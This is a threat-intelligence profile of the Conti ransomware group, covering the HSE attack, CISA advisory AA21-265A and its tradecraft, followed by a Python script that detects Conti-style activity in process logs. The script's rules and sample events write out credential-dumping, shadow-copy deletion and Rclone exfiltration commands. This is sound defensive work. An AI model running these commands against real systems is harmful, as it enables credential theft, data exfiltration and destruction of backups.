Conti

Also known as: Conti Ransomware Group
Affiliation: Russia-aligned
Motivation: Financial / ransomware extortion
Status: Inactive
Country: Russia
First Seen: 2020
Last Seen: 2022
Target Sectors: Healthcare, emergency services, law enforcement
Target Geographies: Ireland, international

Executive Summary

Conti was a Russia-based ransomware-as-a-service (RaaS) operation active from approximately 2020 through mid-2022. CISA, FBI, and NSA jointly documented the group in advisory AA21-265A (first published September 2021), attributing to it over 400 attacks against U.S. and international organizations. MITRE ATT&CK tracks the ransomware as software entry S0575; the operators are not catalogued as a separate ATT&CK group.

The group operated a double-extortion model: encrypting victim data while simultaneously threatening to publish exfiltrated files on a dedicated leak site (“Conti News”) if ransom demands were not met. Conti functioned as a ransomware-as-a-service platform, with a core team providing tooling, infrastructure, and negotiation support to operators who conducted the intrusions. AA21-265A notes one departure from the typical affiliate model: the developers likely paid the deployers a wage rather than a percentage of each ransom.

Notable Campaigns

Conti attacked Ireland’s Health Service Executive (HSE) on 14 May 2021, the largest cyber attack on an Irish state body to date. The HSE shut down its IT systems nationally in response, disrupting hospital services and forcing the cancellation of outpatient appointments and diagnostic services for weeks. The Irish government declined to pay the ransom (reported at roughly USD 20 million); Conti released a decryption tool about a week later without payment but continued to threaten publication of exfiltrated patient and staff data, and full restoration of services took months.

CISA advisory AA21-265A documented over 400 attacks against U.S. and international organizations, and earlier FBI reporting identified at least 16 attacks on U.S. healthcare and first-responder networks, including law enforcement agencies, emergency medical services, 911 dispatch centers, and municipalities. Ransom demands in documented cases reached as high as $25 million. The advisory noted a consistent targeting pattern against healthcare and first-responder networks, where downtime pressure raises the likelihood of payment.

Technical Capabilities

Conti’s intrusion chain typically began with phishing-delivered loaders, primarily BazarLoader and TrickBot. The advisory also lists stolen or weak RDP credentials, fake software promoted through search engine poisoning, other malware distribution networks such as ZLoader, and exploitation of vulnerabilities in internet-facing assets as entry points. Post-access activity consistently followed a pattern documented in the CISA advisory and corroborating incident reporting: Cobalt Strike deployment for command and control, LSASS and Kerberos credential harvesting via Mimikatz, privilege escalation through unpatched Windows flaws such as Zerologon (CVE-2020-1472) and PrintNightmare (CVE-2021-34527), lateral movement using Windows administrative tools and SMB shares, and bulk data staging and exfiltration using Rclone or similar utilities prior to ransomware deployment.

The ransomware payload used hybrid encryption: files were encrypted with a ChaCha-family stream cipher (later versions use ChaCha8, often described loosely as ChaCha20), and the per-file key material was wrapped with an RSA-4096 public key embedded in the binary, so that decryption requires the private key held only by the operators. Deployment followed a structured playbook, leaked by a disgruntled affiliate in August 2021 and reflected in CISA advisory AA21-265A, covering disabling security software, deleting volume shadow copies, and pushing the encryptor across the network. The group maintained support infrastructure including negotiation teams, leak site operators, and technical staff, consistent with its RaaS operating model.

Attribution

CISA, FBI, and NSA jointly attributed Conti activity to Russia-based cybercriminals in advisory AA21-265A and subsequent updates. The advisory did not identify specific individuals or organizational sponsors. The Russia-based assessment rests on operational patterns, infrastructure, and the group’s own 25 February 2022 public statement expressing full support for the Russian government following the invasion of Ukraine. That statement was followed within days by an insider’s leak of the group’s internal chat logs and source code, and the Conti brand was wound down by mid-2022, with operators dispersing to other ransomware crews.

The relationship between Conti and Russian state intelligence services is not established in public reporting. The group operated as a criminal enterprise; its alignment statement and operational geography are consistent with a Russia-based criminal operation that is tolerated, or at least not actively suppressed, by Russian authorities, which is a distinct assessment from state direction or sponsorship.

MITRE ATT&CK Profile

T1566.001 - Spearphishing Attachment: Initial access relied primarily on phishing emails carrying malicious attachments, or links to them, that delivered BazarLoader or TrickBot.

T1003.001 - LSASS Memory: Credential access used LSASS memory dumping, typically via Mimikatz, to harvest credentials and Kerberos tickets for further access.

T1021.002 - SMB/Windows Admin Shares: Operators moved laterally by connecting to Windows admin shares (C$, ADMIN$) over SMB with harvested credentials.

T1027 - Obfuscated Files or Information: Intrusion activity relied on obfuscated tooling and scripts designed to evade endpoint detection.

T1219 - Remote Access Software: Operators installed legitimate remote access software such as AnyDesk for persistent interactive access, alongside Cobalt Strike beacons for command and control.

T1486 - Data Encrypted for Impact: The ransomware deployment phase encrypted data across compromised networks.

T1490 - Inhibit System Recovery: Operators inhibited recovery by deleting volume shadow copies (via vssadmin or WMI) and disabling or deleting backup mechanisms before encryption.
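The techniques above and the post-access chain in Technical Capabilities map onto a small number of command-line patterns that are cheap to hunt for in process-creation telemetry. The following Python is an added example, not code from the page or from any of its sources. It assumes Sysmon Event ID 1 style records already parsed into dicts with the fields id, host, user, image and cmd (the field names and the sample events are constructed), and tags command lines that match the page’s techniques; the Rclone rule uses the standard T1567.002 mapping, which goes beyond the page’s own list. Patterns are the commonly abused built-in commands, not Conti-specific indicators.

```python
"""Process-creation triage for Conti-style post-access tradecraft.

Added example (not the page's or the advisory's code). Assumed input: dicts
with id, host, user, image, cmd, as a SIEM would produce from Sysmon EID 1.
"""
import re

# (technique id, short description, regex over "image + command line").
RULES = [
    ("T1490", "shadow copies deleted",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("T1490", "recovery environment or backup catalog disabled",
     re.compile(r"bcdedit(\.exe)?\b.*recoveryenabled\s+no|wbadmin(\.exe)?\s+delete\s+catalog", re.I)),
    ("T1003.001", "LSASS memory dump (procdump, comsvcs MiniDump, Mimikatz)",
     re.compile(r"procdump.*\s-ma\s+lsass|comsvcs\.dll,?\s*minidump|sekurlsa::", re.I)),
    ("T1021.002", "admin share mapped or PsExec to remote host",
     re.compile(r"net1?(\.exe)?\s+use\s+\\\\\S+?\\(admin|ipc|[a-z])\$|psexec(64)?(\.exe)?\s+\\\\", re.I)),
    ("T1219", "AnyDesk remote access software executed",
     re.compile(r"\banydesk(\.exe)?\b", re.I)),
    ("T1567.002", "Rclone copy/sync to a configured remote",
     re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b", re.I)),
]

# Constructed sample telemetry, loosely modelled on the intrusion chain above.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS-042", "user": "CORP\\j.doe",
     "image": "C:\\Windows\\System32\\net.exe",
     "cmd": "net use \\\\FS01\\C$ /user:CORP\\admin P@ssw0rd"},
    {"id": 2, "host": "WS-042", "user": "CORP\\j.doe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmd": "powershell.exe Get-Service -Name Spooler"},
    {"id": 3, "host": "DC01", "user": "CORP\\svc-backup",
     "image": "C:\\Windows\\System32\\rundll32.exe",
     "cmd": "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 712 C:\\temp\\lsass.dmp full"},
    {"id": 4, "host": "FS01", "user": "CORP\\j.doe",
     "image": "C:\\ProgramData\\rclone.exe",
     "cmd": 'rclone.exe copy "\\\\FS01\\Finance" mega:staging --transfers 10'},
    {"id": 5, "host": "WS-042", "user": "CORP\\j.doe",
     "image": "C:\\Users\\j.doe\\Downloads\\AnyDesk.exe",
     "cmd": "AnyDesk.exe --install C:\\ProgramData\\AnyDesk --silent"},
    {"id": 6, "host": "WS-042", "user": "CORP\\j.doe",
     "image": "C:\\Windows\\System32\\vssadmin.exe",
     "cmd": "vssadmin.exe Delete Shadows /All /Quiet"},
]


def detect(events):
    """Return one hit per (event, rule) match, in event order."""
    hits = []
    for ev in events:
        # Match on image path plus command line so a renamed binary still
        # trips on its arguments and a bare binary name still trips on the path.
        haystack = f"{ev['image']} {ev['cmd']}"
        for technique, description, pattern in RULES:
            if pattern.search(haystack):
                hits.append({"event_id": ev["id"], "host": ev["host"],
                             "user": ev["user"], "technique": technique,
                             "description": description})
    return hits


def escalate(hits, min_techniques=2):
    """Hosts on which several distinct techniques fired.

    A lone hit (an admin mapping a share, a backup job touching shadow copies)
    is noisy; shadow-copy deletion next to credential access or remote tooling
    on the same host is the hands-on-keyboard pattern the advisory describes.
    Returns sorted host names.
    """
    seen = {}
    for h in hits:
        seen.setdefault(h["host"], set()).add(h["technique"])
    return sorted(host for host, techs in seen.items() if len(techs) >= min_techniques)


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for h in found:
        print(f"event {h['event_id']:>3} {h['host']:<7} {h['technique']:<10} {h['description']}")
    print("escalate:", escalate(found))
```

On the constructed sample, five of the six events fire (the PowerShell service query does not), and only WS-042 is escalated because it alone shows three distinct techniques. In production the regexes would be tuned against the environment’s own admin tooling, and the T1490 rule in particular should be correlated with the originating user and process tree, since legitimate backup agents also delete shadow copies.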

Sources & References